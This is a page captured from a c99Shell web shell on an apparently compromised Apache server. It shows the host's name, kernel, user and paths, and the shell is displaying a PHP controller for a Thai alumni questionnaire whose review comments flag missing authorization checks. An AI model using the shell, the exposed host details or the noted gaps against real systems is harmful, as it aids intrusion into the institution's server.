!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/ealumni/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.89%)


Viewing file:     add_ansqn.php (12.37 KB)      -rwxr-xr-x
<?php
include('ea_controller.php');
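/**
 * Alumni questionnaire controller: shows the questionnaire form (or the stored
 * answers) for one alumni record and processes a submitted questionnaire.
 *
 * The listing this class was recovered from had lost assignment operators,
 * ternary colons, one argument comma and a few numeric literals. They are
 * restored here; every literal that had to be inferred carries a NOTE(review).
 *
 * NOTE(review): both actions take alumniId from the request. Nothing in this
 * class checks that the logged-in user (session key 'UsLogin') may read or
 * write that alumni record -- confirm that Ea_controller enforces it.
 * NOTE(review): the xss_clean rule only filters input; the views still have to
 * escape these values for the context they are printed in.
 */
class Add_ansqn extends Ea_controller {

    /**
     * Show the questionnaire for one alumni record, or the stored answers when
     * the questionnaire does not have to be filled in (again).
     *
     * Pre-admission position ids (preAdmitPositionId):
     *   1 general public, 2 civil servant, 3 permanent employee,
     *   4 temporary employee, 5 village health volunteer,
     *   6 child of a village health volunteer.
     *
     * @param mixed $id alumni id from the URI; a posted 'alumniId' takes precedence
     */
    public function ans_Qn($id=0) {
        $eaFolder = $this->config->item("ea_folder");

        $this->load->model($eaFolder.'m_alumnimain','am');
        $this->load->model($eaFolder.'m_ea_alumniqn','aq');
        $this->load->model($eaFolder.'m_majoredu','maj');
        $this->load->model($eaFolder.'m_leveledu','lev');

        // A posted id wins over the URI segment (the validation-failure path
        // re-enters this method without arguments and relies on that).
        $postedId = $this->input->post('alumniId');
        $alumniId = $postedId ? $postedId : $id;

        // Option lists for the major and education-level drop-downs.
        $this->contents['rs_maj'] = $this->maj->get_options('', array('majoreduName' => ''));
        $this->contents['rs_lev'] = $this->lev->get_options('', array('leveleduName' => ''));

        // ###### personal information ######
        $this->contents['qu_am'] = $this->am->qryAmJoinAbPf(array('am.alumniId' => $alumniId));
        $this->contents['qu_curd'] = $this->am->qryAmJoinCurd(array('alumniId' => $alumniId));
        $this->contents['alumniId'] = $alumniId;
        // ###### end of personal information ######

        // Alumni who already answered, or whose pre-admission status is civil
        // servant or permanent employee, get the read-only answer view.
        // Fetching the row once and guarding both fields with isset() avoids a
        // property access on a non-object when the query returned no row.
        // NOTE(review): the literal 2 was lost in the listing; it is restored
        // from the status legend (2 = civil servant, 3 = permanent employee).
        $row = $this->contents['qu_am']->row();
        $alreadyAnswered = isset($row->amAnsQn) && $row->amAnsQn=="Y";
        $exemptStatus = isset($row->preAdmitPositionId)
            && ($row->preAdmitPositionId==2 || $row->preAdmitPositionId==3);

        if($alreadyAnswered || $exemptStatus) {
            $this->contents['ansQn'] = $this->aq->qryAqJoinAm(array('aqAlumniId' => $alumniId));
            $this->contents['ansQn_work'] = $this->aq->qryQnWorkAddr(array('aqAlumniId' => $alumniId));

            $this->output($eaFolder."v_showAnsQn");
        } else {
            $this->output($eaFolder."v_addAnsQn");
        }
    }

    /**
     * Validate a submitted questionnaire and, for alumni who have not answered
     * yet, store the answer plus the matching work or education history row.
     *
     * Posted 'state' values:
     *   1 worked before enrolling, 2 employed, 3 continuing studies.
     *
     * On successful validation the request ends in a redirect back to ans_Qn;
     * otherwise the form is shown again through ans_Qn().
     */
    public function process_ansQn() {
        // Read before validation runs, so these two are the raw posted values.
        $state = $this->input->post('state');
        $preAdmit = $this->input->post('preAdmit');

        $this->load->library('form_validation');
        $this->form_validation->set_error_delimiters('<div class="error">','</div>');
        $this->form_validation->set_rules('preAdmit',' ','trim|xss_clean');

        // Civil servants ("2") and permanent employees ("3") skip the
        // state-dependent part of the form.
        if($preAdmit!="2" && $preAdmit!="3") {
            $this->form_validation->set_rules('state',' ','trim|required|xss_clean');

            // NOTE(review): the numeric literals in both conditions were lost
            // in the listing. 2 and 3 are inferred from which fields each
            // branch makes required and from the state legend -- confirm.
            if($state==2 || ($state=="")) {
                $this->_apply_rules($this->_rules_for_work());
            } else if($state==3 || $state=="") {
                $this->_apply_rules($this->_rules_for_study());
            }
        }

        $this->form_validation->set_rules('investiture',' ','trim|required|xss_clean');
        // NOTE(review): alumniId is used as a record key and in the redirect
        // target below but is not checked to be a number here; consider adding
        // required|is_natural_no_zero once the id format is confirmed.
        $this->form_validation->set_rules('alumniId',' ','trim|xss_clean');

        if($this->form_validation->run() == true) {
            $eaFolder = $this->config->item("ea_folder");
            $this->load->model($eaFolder.'m_ea_alumniqn','aq');
            $this->load->model($eaFolder.'m_alumnimain','am');
            $this->load->model($eaFolder.'m_ea_hiseducation','hed');
            $this->load->model($eaFolder.'m_hiswork','hw');

            // Store the further-study / work history and update amAnsQn.
            $employed = ($state==2);
            $studying = ($state==3);

            // Work answers only count when the alumnus reported being employed.
            $aqWorkStatus = $employed ? $this->input->post('aqWorkStatus') : "";
            $aqWorkStartDate = $employed ? splitDateForm2($this->input->post('aqWorkStartDate'),'-') : "0000-00-00";
            $aqWorkPosition = $employed ? $this->input->post('aqWorkPosition') : "";
            $aqWorkSalary = $employed ? $this->input->post('aqWorkSalary') : "0";
            $aqWorkSalarySpe = $employed ? $this->input->post('aqWorkSalarySpe') : "0";
            $workCompanyT = $employed ? $this->input->post('workCompanyT') : "";
            $workCompanyE = $employed ? $this->input->post('workCompanyE') : "";
            $aqWorkAddress = $employed ? $this->input->post('aqWorkAddress') : "";
            $dtIdWork = $employed ? $this->input->post('dtIdWork') : "0";
            $apIdWork = $employed ? $this->input->post('apIdWork') : "0";
            $prvIdWork = $employed ? $this->input->post('prvIdWork') : "0";
            $aqWorkZipcode = $employed ? $this->input->post('aqWorkZipcode') : "0";
            $aqWorkTelephone = $employed ? $this->input->post('aqWorkTelephone') : "";

            // Education answers only count when the alumnus continues studying.
            $aqDegree = $studying ? $this->input->post('aqDegree') : "";
            $aqEduStartDate = $studying ? splitDateForm2($this->input->post('aqEduStartDate'),'-') : "0000-00-00";
            $aqMajId = $studying ? $this->input->post('aqMajId') : "0";
            $aqLevelId = $studying ? $this->input->post('aqLevelId') : "0";
            $hedEduId = $studying ? $this->input->post('hedEduId') : "0";

            $alumniId = $this->input->post('alumniId');
            $investiture = $this->input->post('investiture');

            $userLogin = $this->session->userdata('UsLogin');

            $this->am->alumniId = $alumniId;
            $this->am->get_by_key(TRUE);

            $this->db->trans_begin();

            // Only for alumni who have not answered the questionnaire yet.
            // NOTE(review): when amAnsQn is anything other than "N" nothing is
            // written, yet the success message below is still shown.
            if($this->am->amAnsQn=="N") {
                $this->aq->aqQnId = "";
                $this->aq->aqAlumniId = $alumniId;
                // NOTE(review): the value used for an empty state was lost in
                // the listing; 1 ("worked before enrolling") is inferred from
                // the state legend -- confirm before relying on it.
                $this->aq->aqStateQn = ($state=="") ? 1 : $state;
                $this->aq->aqWorkStatus = $this->_blank_if_empty($aqWorkStatus);
                $this->aq->aqWorkCompanyT = $this->_blank_if_empty($workCompanyT);
                $this->aq->aqWorkCompanyE = $this->_blank_if_empty($workCompanyE);
                $this->aq->aqWorkPosition = $this->_blank_if_empty($aqWorkPosition);
                $this->aq->aqWorkAddress = $this->_blank_if_empty($aqWorkAddress);
                $this->aq->aqWorkDtId = $dtIdWork;
                $this->aq->aqWorkApId = $apIdWork;
                $this->aq->aqWorkPrvId = $prvIdWork;
                $this->aq->aqWorkZipcode = $this->_blank_if_empty($aqWorkZipcode);
                $this->aq->aqWorkTelephone = $this->_blank_if_empty($aqWorkTelephone);
                $this->aq->aqWorkSalary = $aqWorkSalary;
                $this->aq->aqWorkSalarySpe = $aqWorkSalarySpe;
                $this->aq->aqWorkStartDate = $aqWorkStartDate;
                $this->aq->aqDegree = $this->_blank_if_empty($aqDegree);
                $this->aq->aqLevelId = $aqLevelId;
                $this->aq->aqMajId = $aqMajId;
                $this->aq->aqEduId = $hedEduId;
                $this->aq->aqEduStartDate = $aqEduStartDate;
                $this->aq->aqInvestiture = $investiture;
                $this->aq->aqUserId = $userLogin;
                $this->aq->aqUserUpdate = date('Y-m-d H:i:s');
                $this->aq->insert();

                // Mark the alumni record as answered.
                $this->am->updateUserId = $userLogin;
                $this->am->updateDateTime = date('Y-m-d H:i:s');
                $this->am->amAnsQn = "Y";
                $this->am->update();

                if($employed) {            // employed: add a work-history row
                    $this->hw->seqId = $this->hw->getNextSeq(array('alumniId' => $alumniId));
                    $this->hw->alumniId = $alumniId;
                    $this->hw->companyNameT = $this->_blank_if_empty($workCompanyT);
                    $this->hw->companyNameE = $this->_blank_if_empty($workCompanyE);
                    $this->hw->companyAddr = $this->_blank_if_empty($aqWorkAddress);
                    $this->hw->companyPosition = $this->_blank_if_empty($aqWorkPosition);
                    $this->hw->companyAdmidPosYear = NULL;
                    $this->hw->companyStartDate = $aqWorkStartDate;
                    $this->hw->companyEndDate = "0000-00-00";
                    $this->hw->hwUserId = $userLogin;
                    $this->hw->hwUserUpdate = date('Y-m-d H:i:s');
                    $this->hw->insert();
                } else if($studying) {    // continuing studies: add an education-history row
                    // NOTE(review): the sequence lookup filters on hedSeqId
                    // with the alumni id, while the work branch filters on
                    // alumniId; this looks like it should be hedAlumniId --
                    // verify against the m_ea_hiseducation model.
                    $this->hed->hedSeqId = $this->hed->getNextSeq(array('hedSeqId' => $alumniId));
                    $this->hed->hedAlumniId = $alumniId;
                    $this->hed->hedDegree = $this->_blank_if_empty($aqDegree);
                    $this->hed->hedLevelId = $aqLevelId;
                    $this->hed->hedEduId = $hedEduId;
                    $this->hed->hedMajId = $aqMajId;
                    $this->hed->hedStartDate = $aqEduStartDate;
                    $this->hed->hedFinishDate = "0000-00-00";
                    $this->hed->hedUserId = $userLogin;
                    $this->hed->hedUserUpdate = date('Y-m-d H:i:s');
                    $this->hed->insert();
                }
            }

            // All writes above succeed or fail together.
            if($this->db->trans_status() === false) {
                $this->db->trans_rollback();
                $stateFlg = "เกิดความผิดพลาดในการตอบแบบสอบถาม ลองใหม่อีกครั้ง";
            } else {
                $this->db->trans_commit();
                $stateFlg = "ตอบแบบสอบถามเรียบร้อย";
            }

            $this->session->set_flashdata('stateFlg', $stateFlg);
            // The id is request data: encode it so it stays a single URI
            // segment of the redirect target (a no-op for a plain number).
            redirect($eaFolder."add_ansqn/ans_Qn/".rawurlencode($alumniId));
        } else {
            $this->ans_Qn();
        }
    }

    /**
     * Register one validation rule per entry, in array order, with the blank
     * label the form uses for every field.
     *
     * @param array $rules field name => rule string
     */
    private function _apply_rules($rules) {
        foreach($rules as $field => $rule) {
            $this->form_validation->set_rules($field, ' ', $rule);
        }
    }

    /**
     * Rules for the "employed" branch: the work fields are required or
     * format-checked, the education fields are only cleaned.
     *
     * @return array field name => rule string
     */
    private function _rules_for_work() {
        return array(
            'aqWorkStatus'    => 'trim|required|xss_clean',
            'aqWorkStartDate' => 'trim|xss_clean',
            'aqWorkPosition'  => 'trim|required|xss_clean',
            'aqWorkSalary'    => 'trim|required|is_natural_no_zero|xss_clean',
            'aqWorkSalarySpe' => 'trim|is_natural_no_zero|xss_clean',
            'workCompanyT'    => 'trim|required|xss_clean',
            'workCompanyE'    => 'trim|xss_clean',
            'aqWorkAddress'   => 'trim|xss_clean',
            'dtNameWork'      => 'trim|xss_clean',
            'dtIdWork'        => 'trim|xss_clean',
            'apNameWork'      => 'trim|xss_clean',
            'apIdWork'        => 'trim|xss_clean',
            'prvNameWork'     => 'trim|xss_clean',
            'prvIdWork'       => 'trim|xss_clean',
            'aqWorkZipcode'   => 'trim|is_natural_no_zero|exact_length[5]|xss_clean',
            'aqWorkTelephone' => 'trim|is_natural_no_zero|min_length[9]|xss_clean',
            'aqDegree'        => 'trim|xss_clean',
            'aqEduStartDate'  => 'trim|xss_clean',
            'aqMajId'         => 'trim|xss_clean',
            'aqLevelId'       => 'trim|xss_clean',
            'educationName'   => 'trim|xss_clean',
            'hedEduId'        => 'trim|xss_clean',
        );
    }

    /**
     * Rules for the "continuing studies" branch: the education fields are
     * required, the work fields are only cleaned.
     *
     * @return array field name => rule string
     */
    private function _rules_for_study() {
        return array(
            'aqWorkStatus'    => 'trim|xss_clean',
            'aqWorkStartDate' => 'trim|xss_clean',
            'aqWorkPosition'  => 'trim|xss_clean',
            'aqWorkSalary'    => 'trim|xss_clean',
            'aqWorkSalarySpe' => 'trim|xss_clean',
            'workCompanyT'    => 'trim|xss_clean',
            'workCompanyE'    => 'trim|xss_clean',
            'aqWorkAddress'   => 'trim|xss_clean',
            'dtNameWork'      => 'trim|xss_clean',
            'dtIdWork'        => 'trim|xss_clean',
            'apNameWork'      => 'trim|xss_clean',
            'apIdWork'        => 'trim|xss_clean',
            'prvNameWork'     => 'trim|xss_clean',
            'prvIdWork'       => 'trim|xss_clean',
            'aqWorkZipcode'   => 'trim|xss_clean',
            'aqWorkTelephone' => 'trim|xss_clean',
            'aqDegree'        => 'trim|required|xss_clean',
            'aqEduStartDate'  => 'trim|xss_clean',
            'aqMajId'         => 'trim|required|xss_clean',
            'aqLevelId'       => 'trim|required|xss_clean',
            'educationName'   => 'trim|xss_clean',
            'hedEduId'        => 'trim|required|xss_clean',
        );
    }

    /**
     * Return "" for any value that loosely equals the empty string (a field
     * that was not posted, for example) and the value itself otherwise.
     *
     * @param mixed $value
     * @return mixed
     */
    private function _blank_if_empty($value) {
        return ($value=="") ? "" : $value;
    }
}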
?>


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0335 ]--